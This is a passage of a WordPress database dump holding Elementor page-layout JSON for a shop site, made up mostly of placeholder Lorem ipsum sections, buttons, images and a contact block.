More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8826,1522,'_elementor_page_assets','a:0:{}'),(8851,1524,'_elementor_edit_mode','builder'),(8852,1524,'_elementor_template_type','wp-page'),(8853,1524,'_elementor_version','3.7.8'),(8854,1524,'_wp_page_template','elementor_canvas'),(8855,1524,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 